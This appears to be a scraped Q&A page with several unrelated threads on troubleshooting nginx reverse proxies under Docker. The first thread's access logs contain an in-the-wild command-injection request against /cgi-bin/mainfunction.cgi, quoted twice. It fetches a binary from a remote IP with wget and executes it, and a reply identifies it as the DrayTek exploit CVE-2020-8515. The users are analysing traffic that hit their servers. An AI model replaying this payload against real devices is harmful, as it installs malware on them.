I'm running nginx with Django on a production server, with the following settings:
# normally you leave this at the default of 1024
events {
worker_connections 1024;
}
http {
# cf http://blog.maxcdn.com/accept-encoding-its-vary-important/
gzip_vary on;
gzip_proxied any;
gzip_types *;
# http://nginx.org/en/docs/http/configuring_https_servers.html#optimization
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 10m;
server_tokens off;
upstream django {
server webapp:8000;
}
# ---------------------------------------------------------------------------
# Production
#
# Use this configuration for a deployment. You'll have to configure SSL.
# ---------------------------------------------------------------------------
#server {
# # rewrite all HTTP to HTTPS
# listen 80;
# server_name ${NGINX_SERVER_NAME};
#
# return 301 https://${NGINX_SERVER_NAME}${DOLLAR}request_uri;
#}
# ---------------------------------------------------------------------------
# Development
#
# You may use this for development. It doesn't use SSL, making it unsafe.
# Remove this setting when moving to production.
# ---------------------------------------------------------------------------
server {
# rewrite all HTTP to HTTPS
listen 80;
server_name ${NGINX_SERVER_NAME};
location /static {
alias /srv/covidoff/static;
# http://stackoverflow.com/q/19213510/1346257
include /etc/nginx/mime.types;
}
location = /robots.txt { return 200 "User-agent: *\nAllow: /"; }
location = /favicon.ico { access_log off; log_not_found off; return 404; }
location / {
uwsgi_pass django;
include uwsgi_params;
}
}
server {
listen 443 ssl default_server;
server_name ${NGINX_SERVER_NAME};
# see http://nginx.org/en/docs/http/configuriNGINX_https_servers.html
ssl_certificate /etc/ssl/certs/${NGINX_CRT_NAME}.crt;
ssl_certificate_key /etc/ssl/private/${NGINX_KEY_NAME}.key;
ssl_prefer_server_ciphers on;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # ie defaults minus SSLv3
location /static {
alias /srv/covidoff/static;
# http://stackoverflow.com/q/19213510/1346257
include /etc/nginx/mime.types;
}
location = /robots.txt { return 200 "User-agent: *\nAllow: /"; }
location = /favicon.ico { access_log off; log_not_found off; return 404; }
location / {
uwsgi_pass django;
include uwsgi_params;
}
}
}
Note: I know that the settings aren't supposed to be like that because it doesn't use HTTPS, but that's what we're using at the moment. It should be fixed later.
One thing that is confusing me is that—given the Docker setup that was provided to me—there are two configuration nginx files, the other one being:
server {
listen 80;
location / {
proxy_pass http://localhost:8000;
proxy_redirect off;
}
}
Worst, is that the docker compose yaml file appears to be pointing to the second file, not the first, but it is the changes that I make to the first that reflect on the server.
version: "3"
volumes:
static-files:
driver: local
postgres:
driver: local
services:
db:
image: postgres:11.1
volumes:
- postgres:/var/lib/postgresql/data/pgdata
env_file:
- ./config/environment/development.env
expose:
- "5432"
webserver:
build: ./nginx
ports:
- "80:80"
- "443:443"
webapp:
build:
context: webapp
volumes:
- ./webapp/covidoff:/srv/covidoff
- static-files:/srv/static-files
ports:
- "8000:8000"
depends_on:
- db
env_file:
- ./config/environment/development.env
You can see the full project here.
Right now I'm not so worried about the server configuration, but it might be important for what I'm about to point out.
After launching (e.g. docker-compose up -d), I see the logs for nginx and they are... Well... Weird.
As you can see from the docker-compose, I have three services running: Django, nginx and Postgres. Using docker logs I see the Django service getting hit quite frequently by requests, but those requests are not showing on the nginx server.
Instead, nginx just shows stuff that I really don't get where it's coming from, such as this request for index.php:
124.156.160.69 - - [02/Apr/2020:18:05:24 +0000] "GET /websql/index.php HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" "-"
Or even GET /, since there's no such thing in deployment:
202.52.58.6 - - [02/Apr/2020:18:35:50 +0000] "GET / HTTP/1.1" 502 157 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-"
95.70.169.166 - - [02/Apr/2020:19:36:19 +0000] "GET / HTTP/1.1" 400 157 "-" "-" "-"
186.64.111.98 - - [02/Apr/2020:19:36:51 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 157 "-" "-" "-"
2020/04/02 20:18:20 [error] 8#8: *2171 connect() failed (111: Connection refused) while connecting to upstream, client: 209.17.97.2, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:8000/", host: "34.242.160.202:80"
209.17.97.2 - - [02/Apr/2020:20:18:20 +0000] "GET / HTTP/1.1" 502 157 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)" "-"
What I need is the normal access.log, with the requests that are hitting django. I don't know what the logs for nginx are showing, or where those requests are coming from.
I the nginx docker container, if I run docker exec -it de807b6ad160 ls /var/log/nginx -la, I get:
lrwxrwxrwx 1 root root 11 Oct 21 19:02 access.log -> /dev/stdout
lrwxrwxrwx 1 root root 11 Oct 21 19:02 error.log -> /dev/stderr
Which means that the log files are empty and (rightfully) being redirected to stdout/stderr.
What am I missing?
Apparently that call to /cgi-bin/mainfunction.cgi is an exploit to create a remote login to your server, I just had the same call, I'm running a different web server, in my case is Apache
200.188.153.18 - - [03/Apr/2020:11:03:34 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 0 "-" "-"
The only difference I see is the IP is coming from and the response I'm giving (400)
Yap it's exploit and i find source code named like a "CVE-2020-8515: DrayTek pre-auth remote root RCE"
Check ur system for bad access. Have a nice day!
[1]: https://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html
Related
I'm building a personal application. It is called SCC would like to be able to redirect an address, like scc.com, to my localhost environment, just for the sake of using my auth0 configuration for OAuth
I'm trying to use Nginx for this.
Basic Structure
Backend GOLang API Running on localhost:8080
Frontend React App Running on localhost:3000
I've tried configuring Nginx as a Reverse proxy but I get Bad Gateway and I'm not being able to solve it
I Confirm both apps, front and back, are running
My nginx docker is running
the containser is created with the following command:
docker run --name nginx \
-p 80:80 -p 443:443 \
-v /home/rafael/repos/streaming-cost-control/nginx.conf:/etc/nginx/nginx.conf \
-v /home/rafael/repos/streaming-cost-control/cert/server.crt:/etc/nginx/server.crt \
-v /home/rafael/repos/streaming-cost-control/cert/server.key:/etc/nginx/server.key \
-d nginx:mainline-alpine
and my nginx.conf file is as follows
user nginx;
worker_processes auto;
error_log /var/log/nginx/error.log notice;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
http {
server {
listen 80;
server_name localhost;
location / {
proxy_pass https://localhost:3000/;
}
}
server {
listen 443 ssl;
ssl_certificate server.crt;
ssl_certificate_key server.key;
server_name localhost;
location / {
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_pass https://localhost:3000/;
}
}
}
I've also added this address to my hosts file
127.0.0.1 localhost
127.0.0.1 scc.com
#127.0.0.1 www.scc.com
# Added by Docker Desktop
192.168.1.6 host.docker.internal
192.168.1.6 gateway.docker.internal
# To allow the same kube context to work on the host and the container:
127.0.0.1 kubernetes.docker.internal
# End of section
the error log on my nginx is:
2022/10/01 13:41:28 [error] 27#27: *8 connect() failed (111: Connection refused) while connecting to upstream, client: 172.17.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "https://127.0.0.1:3000/", host: "scc.com"
172.17.0.1 - - [01/Oct/2022:13:41:28 +0000] "GET / HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
2022/10/01 13:41:28 [error] 27#27: *8 connect() failed (111: Connection refused) while connecting to upstream, client: 172.17.0.1, server: localhost, request: "GET /favicon.ico HTTP/1.1", upstream: "https://127.0.0.1:3000/favicon.ico", host: "scc.com", referrer: "https://scc.com/"
172.17.0.1 - - [01/Oct/2022:13:41:28 +0000] "GET /favicon.ico HTTP/1.1" 502 559 "https://scc.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
I'm running on windows with Ubuntu on WSL2
Could you help me finding the issue?
Thanks in advance
I have a web service powered via plotly dash running in a docker container reverse proxied by an nginx container, all coordinated via docker compose.
docker-compose.yaml
services:
reverse_proxy:
image: nginx:1.17.10
volumes:
- ./nginx.conf:/etc/nginx/nginx.conf:Z,ro # nginx configuration
- ../../resources:/usr/share/nginx/html/:Z,ro # static assets, 404.html etc
- /etc/pki/tls/certs/:/etc/pki/tls/certs/:Z,ro # SSL stuff
ports:
- "80:80"
- "443:443"
depends_on:
- my_server
my_server:
image: my_server:v1.2.3
command: --config /app/configs/prod.yaml --port 8050 8051
nginx.conf
upstream my_server {
ip_hash;
server my_server:8050;
server my_server:8051;
}
server {
listen 80 default_server;
listen [::]:80 default_server;
listen 443 ssl;
server_name my-server.com;
root /usr/share/nginx/html; # I assume this has something to do with it!
ssl_certificate /etc/pki/tls/certs/2022/my-server.crt;
ssl_certificate_key /etc/pki/tls/certs/2022/my-server.key;
ssl_password_file /etc/pki/tls/certs/2022/my-server.txt;
# Load configuration files for the default server block.
include /etc/nginx/default.d/*.conf;
location /prod/app/ {
proxy_pass http://my_server/;
proxy_redirect off;
proxy_buffering off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
location = / {
root /usr/share/nginx/html; # or this...?
index index.html;
}
Upon running docker compose up --remove-orphans --force-recreate --renew-anon-volumes
I see the success message that my Dash server is running:
Dash is running on http://0.0.0.0:8050/
and the nginx container starts without error. However when I query my service via https://my-server.com/prod/app/
nginx fails to (cache?) and load plotly Dash javascript within its specified root directory:
# the location seems to be found and routed correctly
10.10.193.8 - - [28/Oct/2022:15:31:21 +0000] "GET /prod/app/ HTTP/1.1" 200 5324 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0" "-"
# fails due to css file not found
my-server-reverse_proxy-1 | 2022/10/28 15:31:21 [error] 7#7: *1 open() "/usr/share/nginx/html/assets/styles.css" failed (2: No such file or directory), client: 10.10.193.8, server: my-server.com, request: "GET /assets/styles.css?m=1666209805.0 HTTP/1.1", host: "my-server.com", referrer: "https://my-server.com/prod/app/"
# fails due to javascript not found
my-server-reverse_proxy-1 | 2022/10/28 15:31:21 [error] 7#7: *1 open() "/usr/share/nginx/html/_dash-component-suites/dash/dcc/dash_core_components.v2_6_2m1666209805.js" failed (2: No such file or directory), server: my-server.com, request: "GET /_dash-component-suites/dash/dcc/dash_core_components.v2_6_2m1666209805.js HTTP/1.1", host: "my-server.com", referrer: "https://my-server.com/prod/app/"
To debug I examined the contents of my nginx container the root directory does exist:
root#4c7190ea055a:/usr/share/nginx/html# ls
404.html 40x.html 50x.html bg.jpg index.html
I am not sure which of the following is causing this error:
nginx mis-configuration (I need to specify the server block root dir somewhere else?)
plotly Dash mis-configuration (I need to tell it to cache / load somewhere else?)
nginx docker volume issue (Doesnt seem to be the issue since I can view the folder inside the container?)
Any help is greatly appreciated!
To add some context:
I'm running an Angular PWA with Node.js backend.
They run on different ports:
· Front-end: Hosted by nginx on port 80
· Back-end: Hosted by Node.js on port 3939
nginx is within a Docker container.
Thing is, I plan to redirect all traffic related to /api from port 80 to port 3939 internally via reverse proxy. I'm testing with /api/agenda to see if it works, but it isn't.
Here's the default.conf file I'm using:
server {
listen 80;
listen [::]:80;
server_name localhost;
#access_log /var/log/nginx/host.access.log main;
location / {
root /usr/share/nginx/html;
index index.html index.htm;
}
location /api/agenda {
proxy_pass http://localhost:3939;
}
#error_page 404 /404.html;
# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
}
I'm testing with Postman to see if redirect works, but I'm getting a 404 while accessing with this url:
http://localhost:80/api/agenda
If I access it using its original port, I do get the desired results, but that's not what I want to do.
http://localhost:3939/api/agenda
Edit: Here's the error logs I get in my docker console when I try to access http://localhost:80/api/agenda
1 | 172.19.0.1 - - [22/Jun/2022:07:13:50 +0000] "GET /api/agenda HTTP/1.1" 404 555 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" "-"
nginx-conf-web-1 | 2022/06/22 07:55:18 [error] 28#28: *8 connect() failed (111: Connection refused) while connecting to upstream, client: 172.19.0.1, server: localhost, request: "GET /api/agenda HTTP/1.1", upstream: "http://127.0.0.1:3939/api/agenda", host: "localhost:80"
Thanks in advance for your help.
One of the comments worked for me, regarding #Ivan Shatsky.
Switching: "https://localhost:port/api
to: https://host.docker.internal:port/api
Thank you to the people in the comments.
I am using docker compose for running nginx with latest version, using the volumes i am copying the nginx.conf files into nginx docker container
nginx:
image: nginx:1.20
container_name: nginx
ports:
- 80:80
restart: unless-stopped
volumes:
- ./nginx/nginx.conf:/etc/nginx/default.conf
depends_on:
- strapi
- rocketchat
- keycloak
networks:
- test-network
Every applications are running on a same Network.
Here is the nginx.conf file
events {
worker_connections 4096; ## Default: 1024
}
http {
server {
listen 80;
server_name qa.xxx.com;
location / {
proxy_pass http://strapi-container:1337/;
}
location /chat {
proxy_pass http://rocketchat-container:3000;
}
location /auth {
proxy_pass http://keycloak-container:8080;
proxy_set_header Host $host;
}
}
}
My intention is to run the three backend URL /, /chat, /auth with nginx configurations. When running the application on instance, http://ip-address/chat, http://ip-address/auth doesn't seems to work
Here is the nginx log error
2021/06/02 07:46:42 [error] 31#31: *1 open() "/usr/share/nginx/html/chat" failed (2: No such file or directory), client: 115.96.103.237, server: localhost, request: "GET /chat HTTP/1.1", host: "310.28.67.222"
115.96.103.237 - - [02/Jun/2021:07:46:42 +0000] "GET /chat HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" "-"
2021/06/02 07:46:50 [error] 31#31: *2 open() "/usr/share/nginx/html/auth" failed (2: No such file or directory), client: 115.96.103.237, server: localhost, request: "GET /auth HTTP/1.1", host: "310.28.67.222"
115.96.103.237 - - [02/Jun/2021:07:46:50 +0000] "GET /auth HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" "-"
Try trailing slashes behind the proxy_pass, unless you want to have the folder added.
location /chat {
proxy_pass http://rocketchat-cnr:3000;
}
redirects to http://rocketchat-cnr:3000/chat, while
location /chat {
proxy_pass http://rocketchat-cnr:3000/;
}
redirects to http://rocketchat-cnr:3000/
Visit http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_pass for more Info
I'm trying to setup multiple servers using Nginx and Docker. For now, I want to make it work locally but I'll export this into to use it in a website. My nginx.conf is:
worker_processes 1;
events { worker_connections 1024; }
http {
client_max_body_size 2048M;
sendfile on;
upstream docker-phpmyadmin {
server phpmyadmin;
}
upstream docker-wordpress {
server wordpress;
}
upstream docker-api {
server api;
}
upstream docker-frontend {
server frontend;
}
server {
listen 80;
server_name example.com;
location / {
proxy_set_header Host $http_host;
proxy_pass http://docker-frontend;
}
}
server {
listen 80;
server_name api.example.com;
location / {
proxy_set_header Host $http_host;
proxy_pass http://docker-api;
}
}
server {
listen 80;
server_name db.example.com;
location / {
proxy_set_header Host $http_host;
proxy_pass http://docker-phpmyadmin;
}
}
server {
listen 80;
server_name admin.example.com;
location / {
proxy_read_timeout 3600;
proxy_set_header Host $http_host;
proxy_pass http://docker-wordpress;
}
}
}
I've added these entries to my /etc/hosts:
127.0.0.1 example.com
127.0.0.1 db.example.com
127.0.0.1 api.example.com
127.0.0.1 admin.example.com
My docker-compose.yml contains:
nginx:
build: ./backend/nginx
links:
- wordpress
- phpmyadmin
- frontend
ports:
- ${NGINX_EXTERNAL_PORT}:80
volumes:
- "./backend/nginx/nginx.conf:/etc/nginx/nginx.conf"
So, locally, NGINX_EXTERNAL_PORT is set to 5000. I can access to db.example.com:5000 and to admin.example.com:5000, but when I try to access to my main page example.com:5000 I get:
nginx_1 | 2019/09/18 21:26:52 [error] 6#6: *8 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: example.com, request: "GET / HTTP/1.1", upstream: "http://172.18.0.7:80/", host: "example.com:5000"
nginx_1 | 172.18.0.1 - - [18/Sep/2019:21:26:52 +0000] "GET / HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
Am I missing something on my configuration for that server block? Thanks!
It turned out to be because the application that was in example.com was not exposing any port, so after including EXPOSE 3000 to the Dockerfile and changing the upstream to
upstream docker-frontend{
server frontend:3000;
}
Works!